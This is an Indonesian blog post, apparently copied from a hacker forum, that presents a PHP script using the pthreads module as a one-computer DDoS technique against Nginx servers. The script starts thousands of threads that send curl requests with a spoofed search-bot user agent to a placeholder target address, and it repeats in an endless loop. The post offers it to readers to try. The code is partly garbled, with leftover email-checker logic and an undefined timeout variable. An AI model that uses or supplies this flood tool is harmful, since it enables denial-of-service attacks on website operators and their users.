Teknik DDos Nginx 1 Komputer Bisa Langsung Down

Teknik DDos Nginx 1 Komputer Bisa Langsung Down - Oke Gan Di Postingan X Ini Saya Akan Membahas Tentang DDos , Teknik DDos Yang Satu Ini Sangatlah Menarik , Kenapa Menarik ? Karena Dengan Hanya 1 PC/Komputer Server Web Bisa Down , #WoW Keren Sangat Kah ?
#Ntah , Coba-In Aja Sendiri

Bahan Bahan
  1. PHP 5.6
  2. Module Pthreads
   <?php
error_reporting(0);
set_time_limit(0);
class My extends Thread{
    function __construct($email){
        $this->email = $email;
    }
    public function sdata($url , $custom , $delCookies = null){
        unlink("cookijem.txt");
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_HEADER, false);
        if($custom[uagent]){
            curl_setopt($ch, CURLOPT_USERAGENT, $custom[uagent]);
        }else{
            curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
            //curl_setopt($ch, CURLOPT_USERAGENT, "Galau Agent ".rand(100,100));
        }
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
        if($custom[rto]){
            curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
        }else{
            curl_setopt($ch, CURLOPT_TIMEOUT, 60);
        }
        if($custom[header]){
            curl_setopt($ch, CURLOPT_HTTPHEADER, $custom[header]);
        }
        curl_setopt($ch, CURLOPT_COOKIEJAR,  getcwd().'/cookijem.txt');
        curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookijem.txt');
        curl_setopt($ch, CURLOPT_VERBOSE, false);
        if($custom[post]){
            if(is_array($custom[post])){
                $query = http_build_query($custom[post]);
            }else{
                $query = $custom[post];
            }
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $query);
        }
        $data           = curl_exec($ch);
        $httpcode       = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        if($delCookies != false){
            unlink("cookijem.txt");
        }
        return array(
            'data'         => $data,
            'decode'     => json_decode($data , true),
            'httpcode'     => $httpcode
        );
    }
    public function readline($pesan){
        echo "[Checker] ".$pesan;
        $answer =  rtrim( fgets( STDIN ));
        return $answer;
    }
    public function clean($string) {
           $string = preg_replace('/\s+/', '', $string);
           $string = str_replace('-', '', $string);
           return preg_replace('/[^A-Za-z0-9@._\-]/', '', $string); // Removes special chars.
    }
    public function run(){
        $data = $this->sdata("---- ALAMAT WEBSITE ---".$this->email);
            if($data['data'] != "app_not_found"){
                echo "w00t => ".$this->email."\r\n";
                exit;
            }else{
                echo "fail => ".$this->email." => ".$data['data']."\r\n";
            }
            sleep(2);
    }
}
class Checker extends My
{
    public function ngerunning(){
        for ($i=0; $i <5000; $i++) {
            $emailist[] = rand(10000,50000).rand(10000,50000);
        }
        /** start mining **/
        foreach ($emailist as $key => $value) {
            echo "Worker ==> ".$key." of ".count($emailist)."\r\n";
            $pool[] = new My($value);
        }
   
    foreach($pool as $worker){
        $worker->start();
    }
    foreach($pool as $worker){
        $worker->join();
    }
}
}
$n = new Checker;
while (1 <= 1000) {
    $n->ngerunning();
}
?>

Nah Semoga Membantu Ya ^_^ !!

Sumber : https://forum.surabayablackhat.org/d/96-teknik-ddos-nginx-apache-cukup-1-komputer-sudah-down

Subscribe to receive free email updates:

0 Response to "Teknik DDos Nginx 1 Komputer Bisa Langsung Down"

Posting Komentar